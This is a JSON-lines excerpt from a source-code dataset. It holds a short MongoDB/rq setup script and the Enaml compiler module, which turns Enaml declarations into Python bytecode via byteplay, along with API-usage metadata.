{"api_name": "el_aap.app.app.post", "line_number": 62, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 62, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 62, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 63, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 63, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 63, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 64, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 64, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 64, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 65, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 65, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 65, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 66, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 66, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 66, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 67, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 67, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 67, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 68, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 68, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 68, "usage_type": "name"}, {"api_name": "requests.delete", "line_number": 86, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 87, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 87, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 87, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 88, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 88, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 89, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 89, "usage_type": "name"}, {"api_name": "el_aap.app.app.delete", "line_number": 81, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 81, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 81, "usage_type": "name"}, {"api_name": "el_aap.app.app.delete", "line_number": 82, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 82, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 82, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 110, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 111, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 111, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 111, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 112, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 112, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 113, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 113, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 96, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 96, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 97, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 97, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 98, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 98, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 99, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 99, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 100, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 100, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 101, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 101, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 102, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 102, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 103, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 103, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 104, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 104, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 105, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 105, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 106, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 106, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 107, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 107, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 138, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 139, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 139, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 139, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 140, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 140, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 120, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 120, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 120, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 121, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 121, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 121, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 122, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 122, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 122, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 123, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 123, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 123, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 124, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 124, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 124, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 125, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 125, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 125, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 126, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 126, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 126, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 127, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 127, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 127, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 128, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 128, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 128, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 129, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 129, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 129, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 130, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 130, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 130, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 131, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 131, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 131, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 132, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 132, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 132, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 133, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 133, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 133, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 134, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 134, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 134, "usage_type": "name"}]} +{"seq_id": "609232326", "text": "from pymongo import Connection\nfrom rq import Queue, use_connection\n\nconnection = Connection('localhost', 27017) # Use defaults\ndb = connection.test_db\ndocument_db = db.messages\n\n# Redis connection for creating worker processes\nuse_connection()\nworker_queue = Queue()\n", "sub_path": "database.py", "file_name": "database.py", "file_ext": "py", "file_size_in_byte": 268, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymongo.Connection", "line_number": 4, "usage_type": "call"}, {"api_name": "rq.use_connection", "line_number": 9, "usage_type": "call"}, {"api_name": "rq.Queue", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "567135451", "text": "#------------------------------------------------------------------------------\n# Copyright (c) 2011, Enthought, Inc.\n# All rights reserved.\n#------------------------------------------------------------------------------\nimport ast\nimport itertools\nimport types\n\nfrom .byteplay import (\n Code, LOAD_FAST, CALL_FUNCTION, LOAD_GLOBAL, STORE_FAST, LOAD_CONST,\n LOAD_ATTR, STORE_SUBSCR, RETURN_VALUE, POP_TOP, MAKE_FUNCTION, STORE_NAME,\n LOAD_NAME, DUP_TOP, SetLineno, BINARY_SUBSCR, STORE_ATTR, ROT_TWO,\n DELETE_NAME, DELETE_FAST\n)\nfrom .code_tracing import inject_tracing, inject_inversion\n\n\n# Increment this number whenever the compiler changes the code which it\n# generates. This number is used by the import hooks to know which version\n# of a .enamlc file is valid for the Enaml compiler version in use. If\n# this number is not incremented on change, it may result in .enamlc\n# files which fail on import.\n#\n# Version History\n# ---------------\n# 1 : Initial compiler version - 2 February 2012\n# 2 : Update line number handling - 26 March 2012\n# When compiling code objects with mode='eval', Python ignores the\n# line number specified by the ast. The workaround is to compile the\n# code object, then make a new copy of it with the proper firstlineno\n# set via the types.CodeType constructor.\n# 3 : Update the generated code to remove the toolkit - 21 June 2012\n# This updates the compiler for the coming switch to async UI's\n# which will see the removal of the Toolkit concept. The only\n# magic scope maintained is for that of operators.\n# 4 : Update component building - 27 July 2012\n# This updates the compiler to handle the new Enaml creation semantics\n# that don't rely on __enaml_call__. Instead the parent is passed\n# directly to the component cls which is a subclass of Declarative.\n# That class handles calling the builder functions upon instance\n# creation. This allows us to get rid of the EnamlDef class and\n# make enamldef constructs proper subclasses of Declarative.\n# 5 : Change the import names - 28 July 2012\n# This changes the imported helper name from _make_decl_subclass_\n# to _make_enamldef_helper_ which is more descriptive, but equally\n# mangled. It also updates the method name used on the Declarative\n# component for adding attribute from _add_decl_attr to the more\n# descriptive _add_user_attribute. Finally, it adds the eval_compile\n# function for compiling Python code in 'eval' mode with proper line\n# number handling.\n# 6 : Compile with code tracing - 24 November 2012\n# This updates the compiler to generate code using the idea of code\n# tracing instead of monitors and inverters. The compiler compiles\n# the expressions into functions which are augmented to accept\n# additional arguments. These arguments are tracer objects which will\n# have methods called in response to bytecode ops executing. These\n# methods can then attach listeners as necessary. This is an easier\n# paradigm to develop with than the previous incarnation. This new\n# way also allows the compiler to generate the final code objects\n# upfront, instead of needed to specialize at runtime for a given\n# operator context. This results in a much smaller footprint since\n# then number of code objects created is n instead of n x m.\n# 7 : Fix bug with local deletes - 10 December 2012\n# This fixes a bug in the locals optimization where the DELETE_NAME\n# opcode was not being replaced with DELETE_FAST.\nCOMPILER_VERSION = 7\n\n\n# The Enaml compiler translates an Enaml AST into Python bytecode.\n#\n# Given this sample declaration in Enaml::\n#\n# FooWindow(Window):\n# id: foo\n# a = '12'\n# PushButton:\n# id: btn\n# text = 'clickme'\n#\n# The compiler generate bytecode that would corresponds to the following\n# Python code (though the function object is never assigned to a name in\n# the global namespace).\n#\n# def FooWindow(instance, identifiers, operators):\n# f_globals = globals()\n# _var_1 = instance\n# identifiers['foo'] = _var_1\n# op = operators['__operator_Equal__']\n# op(_var_1, 'a', , identifiers)\n# _var_2 = f_globals['PushButton'](_var_1)\n# identifiers['btn'] = _var_2\n# op = operators['__operator_Equal__']\n# op(_var_2, 'text', , identifiers)\n# return _var_1\n#\n# FooWindow = _make_enamldef_helper_('FooWindow', Window, FooWindow)\n\n\n#------------------------------------------------------------------------------\n# Compiler Helpers\n#------------------------------------------------------------------------------\n# Code that will be executed at the top of every enaml module\nSTARTUP = ['from enaml.core.compiler_helpers import _make_enamldef_helper_']\n\n\n# Cleanup code that will be included in every compiled enaml module\nCLEANUP = ['del _make_enamldef_helper_']\n\n\ndef _var_name_generator():\n \"\"\" Returns a generator that generates sequential variable names for\n use in a code block.\n\n \"\"\"\n count = itertools.count()\n while True:\n yield '_var_' + str(count.next())\n\n\ndef update_firstlineno(code, firstlineno):\n \"\"\" Returns a new code object with an updated first line number.\n\n \"\"\"\n return types.CodeType(\n code.co_argcount, code.co_nlocals, code.co_stacksize, code.co_flags,\n code.co_code, code.co_consts, code.co_names, code.co_varnames,\n code.co_filename, code.co_name, firstlineno, code.co_lnotab,\n code.co_freevars, code.co_cellvars,\n )\n\n\n#------------------------------------------------------------------------------\n# Expression Compilers\n#------------------------------------------------------------------------------\ndef replace_global_loads(codelist, explicit=None):\n \"\"\" A code transformer which rewrites LOAD_GLOBAL opcodes.\n\n This transform will replace the LOAD_GLOBAL opcodes with LOAD_NAME\n opcodes. The operation is performed in-place.\n\n Parameters\n ----------\n codelist : list\n The list of byteplay code ops to modify.\n\n explicit : set or None\n The set of global names declared explicitly and which should\n remain untransformed.\n\n \"\"\"\n # Replacing LOAD_GLOBAL with LOAD_NAME enables dynamic scoping by\n # way of a custom locals mapping. The `call_func` function in the\n # `funchelper` module enables passing a locals map to a function.\n explicit = explicit or set()\n for idx, (op, op_arg) in enumerate(codelist):\n if op == LOAD_GLOBAL and op_arg not in explicit:\n codelist[idx] = (LOAD_NAME, op_arg)\n\n\ndef optimize_locals(codelist):\n \"\"\" Optimize the given code object for fast locals access.\n\n All STORE_NAME opcodes will be replaced with STORE_FAST. Names which\n are stored and then loaded via LOAD_NAME are rewritten to LOAD_FAST\n and DELETE_NAME is rewritten to DELETE_FAST. This transformation is\n applied in-place.\n\n Parameters\n ----------\n codelist : list\n The list of byteplay code ops to modify.\n\n \"\"\"\n fast_locals = set()\n for idx, (op, op_arg) in enumerate(codelist):\n if op == STORE_NAME:\n fast_locals.add(op_arg)\n codelist[idx] = (STORE_FAST, op_arg)\n for idx, (op, op_arg) in enumerate(codelist):\n if op == LOAD_NAME and op_arg in fast_locals:\n codelist[idx] = (LOAD_FAST, op_arg)\n elif op == DELETE_NAME and op_arg in fast_locals:\n codelist[idx] = (DELETE_FAST, op_arg)\n\n\ndef compile_simple(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `=`.\n\n Parameters\n ----------\n py_ast : ast.Expression\n A Python ast Expression node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : types.CodeType\n A Python code object which implements the desired behavior.\n\n \"\"\"\n code = compile(py_ast, filename, mode='eval')\n code = update_firstlineno(code, py_ast.lineno)\n bp_code = Code.from_code(code)\n replace_global_loads(bp_code.code)\n optimize_locals(bp_code.code)\n bp_code.newlocals = False\n return bp_code.to_code()\n\n\ndef compile_notify(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `::`.\n\n Parameters\n ----------\n py_ast : ast.Module\n A Python ast Module node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : types.CodeType\n A Python code object which implements the desired behavior.\n\n \"\"\"\n explicit_globals = set()\n for node in ast.walk(py_ast):\n if isinstance(node, ast.Global):\n explicit_globals.update(node.names)\n code = compile(py_ast, filename, mode='exec')\n bp_code = Code.from_code(code)\n replace_global_loads(bp_code.code, explicit_globals)\n optimize_locals(bp_code.code)\n bp_code.newlocals = False\n return bp_code.to_code()\n\n\ndef compile_subscribe(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `<<`.\n\n Parameters\n ----------\n py_ast : ast.Expression\n A Python ast Expression node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : types.CodeType\n A Python code object which implements the desired behavior.\n\n \"\"\"\n code = compile(py_ast, filename, mode='eval')\n code = update_firstlineno(code, py_ast.lineno)\n bp_code = Code.from_code(code)\n replace_global_loads(bp_code.code)\n optimize_locals(bp_code.code)\n bp_code.code = inject_tracing(bp_code.code)\n bp_code.newlocals = False\n bp_code.args = ('_[tracer]',) + bp_code.args\n return bp_code.to_code()\n\n\ndef compile_update(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `>>`.\n\n Parameters\n ----------\n py_ast : ast.Expression\n A Python ast Expression node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : types.CodeType\n A Python code object which implements the desired behavior.\n\n \"\"\"\n code = compile(py_ast, filename, mode='eval')\n code = update_firstlineno(code, py_ast.lineno)\n bp_code = Code.from_code(code)\n replace_global_loads(bp_code.code)\n optimize_locals(bp_code.code)\n bp_code.code = inject_inversion(bp_code.code)\n bp_code.newlocals = False\n bp_code.args = ('_[inverter]', '_[value]') + bp_code.args\n return bp_code.to_code()\n\n\ndef compile_delegate(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `:=`.\n\n This will generate two code objects: one which is equivalent to\n operator `<<` and another which is equivalent to `>>`.\n\n Parameters\n ----------\n py_ast : ast.Expression\n A Python ast Expression node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : tuple\n A 2-tuple of types.CodeType equivalent to operators `<<` and\n `>>` respectively.\n\n \"\"\"\n code = compile(py_ast, filename, mode='eval')\n code = update_firstlineno(code, py_ast.lineno)\n bp_code = Code.from_code(code)\n bp_code.newlocals = False\n codelist = bp_code.code[:]\n bp_args = tuple(bp_code.args)\n replace_global_loads(codelist)\n optimize_locals(codelist)\n sub_list = inject_tracing(codelist)\n bp_code.code = sub_list\n bp_code.args = ('_[tracer]',) + bp_args\n sub_code = bp_code.to_code()\n upd_list = inject_inversion(codelist)\n bp_code.code = upd_list\n bp_code.args = ('_[inverter]', '_[value]') + bp_args\n upd_code = bp_code.to_code()\n return (sub_code, upd_code)\n\n\nCOMPILE_OP_MAP = {\n '__operator_Equal__': compile_simple,\n '__operator_ColonColon__': compile_notify,\n '__operator_LessLess__': compile_subscribe,\n '__operator_GreaterGreater__': compile_update,\n '__operator_ColonEqual__': compile_delegate,\n}\n\n\n#------------------------------------------------------------------------------\n# Node Visitor\n#------------------------------------------------------------------------------\nclass _NodeVisitor(object):\n \"\"\" A node visitor class that is used as base class for the various\n Enaml compilers.\n\n \"\"\"\n def visit(self, node):\n \"\"\" The main visitor dispatch method.\n\n Unhandled nodes will raise an error.\n\n \"\"\"\n name = 'visit_%s' % node.__class__.__name__\n try:\n method = getattr(self, name)\n except AttributeError:\n method = self.default_visit\n method(node)\n\n def visit_nonstrict(self, node):\n \"\"\" A nonstrict visitor dispatch method.\n\n Unhandled nodes will be ignored.\n\n \"\"\"\n name = 'visit_%s' % node.__class__.__name__\n try:\n method = getattr(self, name)\n except AttributeError:\n pass\n else:\n method(node)\n\n def default_visit(self, node):\n \"\"\" The default visitor method. Raises an error since there\n should not be any unhandled nodes.\n\n \"\"\"\n raise ValueError('Unhandled Node %s.' % node)\n\n\n#------------------------------------------------------------------------------\n# Declaration Compiler\n#------------------------------------------------------------------------------\nclass DeclarationCompiler(_NodeVisitor):\n \"\"\" A visitor which compiles a Declaration node into a code object.\n\n \"\"\"\n @classmethod\n def compile(cls, node, filename):\n \"\"\" The main entry point of the DeclarationCompiler.\n\n This compiler compiles the given Declaration node into a code\n object for a builder function.\n\n Parameters\n ----------\n node : Declaration\n The Declaration node to compiler.\n\n filename : str\n The string filename to use for the generated code objects.\n\n \"\"\"\n compiler = cls(filename)\n compiler.visit(node)\n code_ops = compiler.code_ops\n code = Code(\n code_ops, [], ['instance', 'identifiers', 'operators'], False,\n False, True, node.name, filename, node.lineno, node.doc,\n )\n return code\n\n def __init__(self, filename):\n \"\"\" Initialize a DeclarationCompiler.\n\n Parameters\n ----------\n filename : str\n The filename string to use for the generated code object.\n\n \"\"\"\n self.filename = filename\n self.code_ops = []\n self.extend_ops = self.code_ops.extend\n self.name_gen = _var_name_generator()\n self.name_stack = []\n self.push_name = self.name_stack.append\n self.pop_name = self.name_stack.pop\n\n def curr_name(self):\n \"\"\" Returns the current variable name on the stack.\n\n \"\"\"\n return self.name_stack[-1]\n\n def visit_Declaration(self, node):\n \"\"\" Creates the bytecode ops for a declaration node.\n\n This node visitor pulls the passed in root into a local var\n and stores it's identifier if one is given. It also loads\n in the commonly used local variables `f_globals`, and `eval_`.\n\n \"\"\"\n name = self.name_gen.next()\n extend_ops = self.extend_ops\n self.push_name(name)\n\n extend_ops([\n (LOAD_NAME, 'globals'), # f_globals = globals()\n (CALL_FUNCTION, 0x0000),\n (STORE_FAST, 'f_globals'),\n (LOAD_FAST, 'instance'), # _var_1 = instance\n (STORE_FAST, name),\n ])\n\n if node.identifier:\n extend_ops([\n (LOAD_FAST, name), # identifiers['foo'] = _var_1\n (LOAD_FAST, 'identifiers'),\n (LOAD_CONST, node.identifier),\n (STORE_SUBSCR, None),\n ])\n\n visit = self.visit\n for item in node.body:\n visit(item)\n\n extend_ops([\n (LOAD_FAST, name), # return _var_1\n (RETURN_VALUE, None),\n ])\n\n self.pop_name()\n\n def visit_AttributeDeclaration(self, node):\n \"\"\" Creates the bytecode ops for an attribute declaration.\n\n The attributes will have already been added to the subclass, so\n this visitor just dispatches to any default bindings which may\n exist on the attribute declaration, since the binding happens\n at instantiation time via operators.\n\n \"\"\"\n default = node.default\n if default is not None:\n self.visit(node.default)\n\n def visit_AttributeBinding(self, node):\n \"\"\" Creates the bytecode ops for an attribute binding.\n\n This visitor handles loading and calling the appropriate\n operator.\n\n \"\"\"\n py_ast = node.binding.expr.py_ast\n op = node.binding.op\n op_compiler = COMPILE_OP_MAP[op]\n code = op_compiler(py_ast, self.filename)\n if isinstance(code, tuple): # operator `::`\n sub_code, upd_code = code\n self.extend_ops([\n (SetLineno, node.binding.lineno),\n (LOAD_FAST, 'operators'), # operators[op](obj, attr, sub_func, identifiers)\n (LOAD_CONST, op),\n (BINARY_SUBSCR, None),\n (LOAD_FAST, self.curr_name()),\n (LOAD_CONST, node.name),\n (LOAD_CONST, sub_code),\n (MAKE_FUNCTION, 0),\n (DUP_TOP, None),\n (LOAD_CONST, upd_code),\n (MAKE_FUNCTION, 0),\n (ROT_TWO, None),\n (STORE_ATTR, '_update'), # sub_func._update = upd_func\n (LOAD_FAST, 'identifiers'),\n (CALL_FUNCTION, 0x0004),\n (POP_TOP, None),\n ])\n else:\n self.extend_ops([\n (SetLineno, node.binding.lineno),\n (LOAD_FAST, 'operators'), # operators[op](obj, attr, func, identifiers)\n (LOAD_CONST, op),\n (BINARY_SUBSCR, None),\n (LOAD_FAST, self.curr_name()),\n (LOAD_CONST, node.name),\n (LOAD_CONST, code),\n (MAKE_FUNCTION, 0),\n (LOAD_FAST, 'identifiers'),\n (CALL_FUNCTION, 0x0004),\n (POP_TOP, None),\n ])\n\n def visit_Instantiation(self, node):\n \"\"\" Create the bytecode ops for a component instantiation.\n\n This visitor handles calling another derived component and\n storing its identifier, if given.\n\n \"\"\"\n extend_ops = self.extend_ops\n parent_name = self.curr_name()\n name = self.name_gen.next()\n self.push_name(name)\n extend_ops([\n (SetLineno, node.lineno),\n (LOAD_NAME, node.name), # _var_2 = globals()['PushButton'](parent)\n (LOAD_FAST, parent_name),\n (CALL_FUNCTION, 0x0001),\n (STORE_FAST, name),\n ])\n\n if node.identifier:\n extend_ops([\n (LOAD_FAST, name), # identifiers['btn'] = _var_2\n (LOAD_FAST, 'identifiers'),\n (LOAD_CONST, node.identifier),\n (STORE_SUBSCR, None),\n ])\n\n visit = self.visit\n for item in node.body:\n visit(item)\n\n self.pop_name()\n\n\n#------------------------------------------------------------------------------\n# Enaml Compiler\n#------------------------------------------------------------------------------\nclass EnamlCompiler(_NodeVisitor):\n \"\"\" A visitor that will compile an enaml module ast node.\n\n The entry point is the `compile` classmethod which will compile\n the ast into an appropriate python code object for a module.\n\n \"\"\"\n @classmethod\n def compile(cls, module_ast, filename):\n \"\"\" The main entry point of the compiler.\n\n Parameters\n ----------\n module_ast : Instance(enaml_ast.Module)\n The enaml module ast node that should be compiled.\n\n filename : str\n The string filename of the module ast being compiled.\n\n \"\"\"\n compiler = cls(filename)\n compiler.visit(module_ast)\n\n module_ops = [(SetLineno, 1)]\n extend_ops = module_ops.extend\n\n # Generate the startup code for the module\n for start in STARTUP:\n start_code = compile(start, filename, mode='exec')\n # Skip the SetLineo and ReturnValue codes\n extend_ops(Code.from_code(start_code).code[1:-2])\n\n # Add in the code ops for the module\n extend_ops(compiler.code_ops)\n\n # Generate the cleanup code for the module\n for end in CLEANUP:\n end_code = compile(end, filename, mode='exec')\n # Skip the SetLineo and ReturnValue codes\n extend_ops(Code.from_code(end_code).code[1:-2])\n\n # Add in the final return value ops\n extend_ops([\n (LOAD_CONST, None),\n (RETURN_VALUE, None),\n ])\n\n # Generate and return the module code object.\n mod_code = Code(\n module_ops, [], [], False, False, False, '', filename, 0, '',\n )\n return mod_code.to_code()\n\n def __init__(self, filename):\n \"\"\" Initialize an EnamlCompiler.\n\n Parameters\n ----------\n filename : str\n The string filename of the module ast being compiled.\n\n \"\"\"\n self.filename = filename\n self.code_ops = []\n self.extend_ops = self.code_ops.extend\n\n def visit_Module(self, node):\n \"\"\" The Module node visitor method.\n\n This visitor dispatches to all of the body nodes of the module.\n\n \"\"\"\n visit = self.visit\n for item in node.body:\n visit(item)\n\n def visit_Python(self, node):\n \"\"\" The Python node visitor method.\n\n This visitor adds a chunk of raw Python into the module.\n\n \"\"\"\n py_code = compile(node.py_ast, self.filename, mode='exec')\n bp_code = Code.from_code(py_code)\n # Skip the SetLineo and ReturnValue codes\n self.extend_ops(bp_code.code[1:-2])\n\n def visit_Declaration(self, node):\n \"\"\" The Declaration node visitor.\n\n This generates the bytecode ops whic create a new type for the\n enamldef and then adds the user defined attributes and events.\n It also dispatches to the DeclarationCompiler which will create\n the builder function for the new type.\n\n \"\"\"\n name = node.name\n extend_ops = self.extend_ops\n filename = self.filename\n func_code = DeclarationCompiler.compile(node, filename)\n extend_ops([\n (SetLineno, node.lineno),\n (LOAD_NAME, '_make_enamldef_helper_'), # Foo = _make_enamldef_helper_(name, base, buildfunc)\n (LOAD_CONST, name),\n (LOAD_NAME, node.base),\n (LOAD_CONST, func_code),\n (MAKE_FUNCTION, 0),\n (CALL_FUNCTION, 0x0003),\n (STORE_NAME, name),\n ])\n\n # We now have a new Declarative subclass stored at 'name' to\n # which we need to add any user defined attributes and events.\n extend_ops([\n (LOAD_NAME, name),\n (LOAD_ATTR, '_add_user_attribute'),\n ])\n\n # Dispatch to add any class-level info contained within the\n # declaration body. Visit nonstrict since not all child nodes\n # are valid at the class-level. The '_add_user_attribute'\n # class method is left on the top of the stack and popped\n # at the end of the visitors.\n visit = self.visit_nonstrict\n for child_node in node.body:\n visit(child_node)\n\n extend_ops([(POP_TOP, None)])\n\n def visit_AttributeDeclaration(self, node):\n \"\"\" Creates the bytecode ops for an attribute declaration.\n\n This will add the ops to add the user attrs and events to\n the new type.\n\n \"\"\"\n attr_type = node.type or 'object'\n self.extend_ops([\n (SetLineno, node.lineno),\n (DUP_TOP, None), #cls._add_user_attribute(name, type, is_event)\n (LOAD_CONST, node.name),\n (LOAD_NAME, attr_type),\n (LOAD_CONST, node.is_event),\n (CALL_FUNCTION, 0x0003),\n (POP_TOP, None),\n ])\n\n", "sub_path": "enaml/core/enaml_compiler.py", "file_name": "enaml_compiler.py", "file_ext": "py", "file_size_in_byte": 24330, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "itertools.count", "line_number": 115, "usage_type": "call"}, {"api_name": "types.CodeType", "line_number": 124, "usage_type": "call"}, {"api_name": "byteplay.LOAD_GLOBAL", "line_number": 156, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 157, "usage_type": "name"}, {"api_name": "byteplay.STORE_NAME", "line_number": 176, "usage_type": "name"}, {"api_name": "byteplay.STORE_FAST", "line_number": 178, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 180, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 181, "usage_type": "name"}, {"api_name": "byteplay.DELETE_NAME", "line_number": 182, "usage_type": "name"}, {"api_name": "byteplay.DELETE_FAST", "line_number": 183, "usage_type": "name"}, {"api_name": "byteplay.Code.from_code", "line_number": 205, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 205, "usage_type": "name"}, {"api_name": "ast.walk", "line_number": 230, "usage_type": "call"}, {"api_name": "ast.Global", "line_number": 231, "usage_type": "attribute"}, {"api_name": "byteplay.Code.from_code", "line_number": 234, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 234, "usage_type": "name"}, {"api_name": "byteplay.Code.from_code", "line_number": 260, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 260, "usage_type": "name"}, {"api_name": "code_tracing.inject_tracing", "line_number": 263, "usage_type": 